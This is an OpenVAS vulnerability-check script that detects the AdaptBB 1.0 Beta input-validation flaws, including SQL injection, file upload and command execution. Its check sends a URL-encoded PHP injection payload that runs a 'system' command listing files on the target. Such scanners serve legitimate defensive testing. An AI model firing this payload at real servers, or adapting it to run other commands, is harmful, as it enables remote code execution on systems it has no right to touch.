###############################################################################
# OpenVAS Vulnerability Test
# $Id: adaptbb_34452.nasl 7189 2010-03-31 13:58:50Z chandra $
#
# AdaptBB Multiple Input Validation Vulnerabilities
#
# Authors
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100128);
 script_bugtraq_id(34452);
 script_version ("1.0");
 script_tag(name:"risk_factor", value:"Medium");

 script_name("AdaptBB Multiple Input Validation Vulnerabilities");
 desc = "

 Overview:
  AdaptBB is prone to multiple security vulnerabilities because it
  fails to adequately sanitize user-supplied input. These
  vulnerabilities include multiple SQL-injection issues, an
  arbitrary-file-upload issue, and an arbitrary-command-execution
  issue.

  Exploiting these issues can allow an attacker to upload and execute
  arbitrary files, compromise the application, access or modify data,
  or exploit latent vulnerabilities in the underlying database. Other
  attacks may also be possible.

  AdaptBB 1.0 Beta is vulnerable; other versions may also be affected. 

 See also:
  http://www.securityfocus.com/bid/34452

 Risk factor : Medium";

 script_description(desc);
 script_summary("Determine if AdaptBB is vulnerable to Multiple Input Validation Vulnerabilities");
 script_category(ACT_GATHER_INFO);
 script_family("Web application abuses");
 script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
 script_dependencie("adaptbb_detect.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);

if(!version = get_kb_item(string("www/", port, "/adaptbb")))exit(0);
if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0);

dir  = matches[2];

  if(!isnull(dir)) {
     url = string(dir, "/index.php?do=profile&user=blabla&box=%3C?php%20echo%20%22%3Cpre%3E%22;%20system(%22ls%20./inc/%22);%20echo%20%22%3C/pre%3E%22;?%3E");
     req = http_get(item:url, port:port);
     buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
     if( buf == NULL )continue;
    
     if(egrep(pattern:"dbinfo.php", string: buf))
       {    
  	   security_warning(port:port);
	   exit(0);
       }
  }


exit(0);
